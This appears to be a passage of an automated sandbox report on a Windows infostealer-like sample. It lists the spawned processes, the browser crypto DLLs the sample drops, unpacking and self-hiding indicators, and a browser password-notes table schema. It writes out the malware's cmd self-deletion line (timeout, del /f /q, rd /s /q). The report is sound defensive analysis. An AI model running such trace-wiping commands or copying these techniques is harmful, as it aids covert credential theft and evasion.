                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                Source: F441.exe, 00000006.00000003.2062240344.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2547989323.000000000093D000.00000004.00000020.00020000.00000000.sdmp, AKECBF.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: softokn3[1].dll.9.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                Source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                Source: softokn3[1].dll.9.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                Source: 4.exeReversingLabs: Detection: 39%
                Source: 4.exeVirustotal: Detection: 45%
                Source: unknownProcess created: C:\Users\user\Desktop\4.exe "C:\Users\user\Desktop\4.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\sdveeeu C:\Users\user\AppData\Roaming\sdveeeu
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F441.exe C:\Users\user\AppData\Local\Temp\F441.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9EDA.exe C:\Users\user\AppData\Local\Temp\9EDA.exe
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeProcess created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmp
                Source: C:\Users\user\AppData\Local\Temp\F441.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F441.exe C:\Users\user\AppData\Local\Temp\F441.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9EDA.exe C:\Users\user\AppData\Local\Temp\9EDA.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeProcess created: C:\Users\user\AppData\Local\Temp\kat796E.tmp C:\Users\user\AppData\Local\Temp\kat796E.tmpJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exitJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Users\user\Desktop\4.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\4.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\4.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\sdveeeuSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: mozglue.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: msvcp140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: dlnashext.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wpdshext.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\4.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: 4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: mozglue.pdbP source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
                Source: Binary string: freebl3.pdb source: freebl3.dll.9.dr
                Source: Binary string: freebl3.pdbp source: freebl3.dll.9.dr
                Source: Binary string: nss3.pdb@ source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
                Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
                Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
                Source: Binary string: nss3.pdb source: kat796E.tmp, 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
                Source: Binary string: mozglue.pdb source: kat796E.tmp, 00000009.00000002.2847113301.000000006F90D000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat796E.tmp, 00000009.00000002.2832929312.000000001DD73000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2832124712.000000001B938000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
                Source: Binary string: softokn3.pdb source: softokn3[1].dll.9.dr

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\4.exeUnpacked PE file: 0.2.4.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\sdveeeuUnpacked PE file: 5.2.sdveeeu.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\F441.exeUnpacked PE file: 6.2.F441.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                Detected unpacking (overwrites its own PE header)
                Source: C:\Users\user\AppData\Local\Temp\F441.exeUnpacked PE file: 6.2.F441.exe.400000.0.unpack
                Source: sqls[1].dll.9.drStatic PE information: section name: .00cfg
                Source: freebl3.dll.9.drStatic PE information: section name: .00cfg
                Source: freebl3[1].dll.9.drStatic PE information: section name: .00cfg
                Source: mozglue.dll.9.drStatic PE information: section name: .00cfg
                Source: mozglue[1].dll.9.drStatic PE information: section name: .00cfg
                Source: msvcp140.dll.9.drStatic PE information: section name: .didat
                Source: msvcp140[1].dll.9.drStatic PE information: section name: .didat
                Source: nss3.dll.9.drStatic PE information: section name: .00cfg
                Source: nss3[1].dll.9.drStatic PE information: section name: .00cfg
                Source: softokn3.dll.9.drStatic PE information: section name: .00cfg
                Source: softokn3[1].dll.9.drStatic PE information: section name: .00cfg
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_00401EA7 push 0000000Eh; retf 0038h0_2_00401EB6
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_004033B6 push eax; ret 0_2_00403419
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02DD1F0E push 0000000Eh; retf 0038h0_2_02DD1F1D
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02DD2D3E push cs; retf 0_2_02DD2D3F
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF4AC3 push eax; ret 0_2_02EF4AC4
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF38DD push 0000000Eh; retf 0038h0_2_02EF38EC
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF386D push cs; retf 0038h0_2_02EF38EC
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF444F push cs; retf 0_2_02EF4450
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF343A push ss; iretw 0_2_02EF344C
                Source: C:\Users\user\Desktop\4.exeCode function: 0_2_02EF9919 push 0000002Ah; iretd 0_2_02EF9963
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_00402CD7 push cs; retf 5_2_00402CD8
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_00401EA7 push 0000000Eh; retf 0038h5_2_00401EB6
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_004033B6 push eax; ret 5_2_00403419
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_02E12D3E push cs; retf 5_2_02E12D3F
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_02E11F0E push 0000000Eh; retf 0038h5_2_02E11F1D
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_03013315 push 0000000Eh; retf 0038h5_2_03013324
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_03019351 push 0000002Ah; iretd 5_2_0301939B
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_03012E72 push ss; iretw 5_2_03012E84
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_03013E87 push cs; retf 5_2_03013E88
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_030132A5 push cs; retf 0038h5_2_03013324
                Source: C:\Users\user\AppData\Roaming\sdveeeuCode function: 5_2_030144FB push eax; ret 5_2_030144FC
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00441DE9 push ebp; ret 6_2_00441E02
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_00441FE4 pushad ; retf 0041h6_2_00441FE5
                Source: C:\Users\user\AppData\Local\Temp\F441.exeCode function: 6_2_0211030D push ecx; ret 6_2_02110315
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeCode function: 8_2_0429B010 push edx; ret 8_2_0429B21F
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeCode function: 8_2_0429A910 push edx; ret 8_2_0429A91B
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F441.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\vcruntime140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\msvcp140.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9EDA.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\mozglue.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\softokn3.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sdveeeuJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\9EDA.exeFile created: C:\Users\user\AppData\Local\Temp\kat796E.tmpJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\nss3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\vcruntime140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\freebl3.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\msvcp140.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\mozglue.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpFile created: C:\ProgramData\HJJJECFIECBG\softokn3.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sdveeeuJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Deletes itself after installation
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\4.exeJump to behavior
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\sdveeeu:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F441.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\kat796E.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
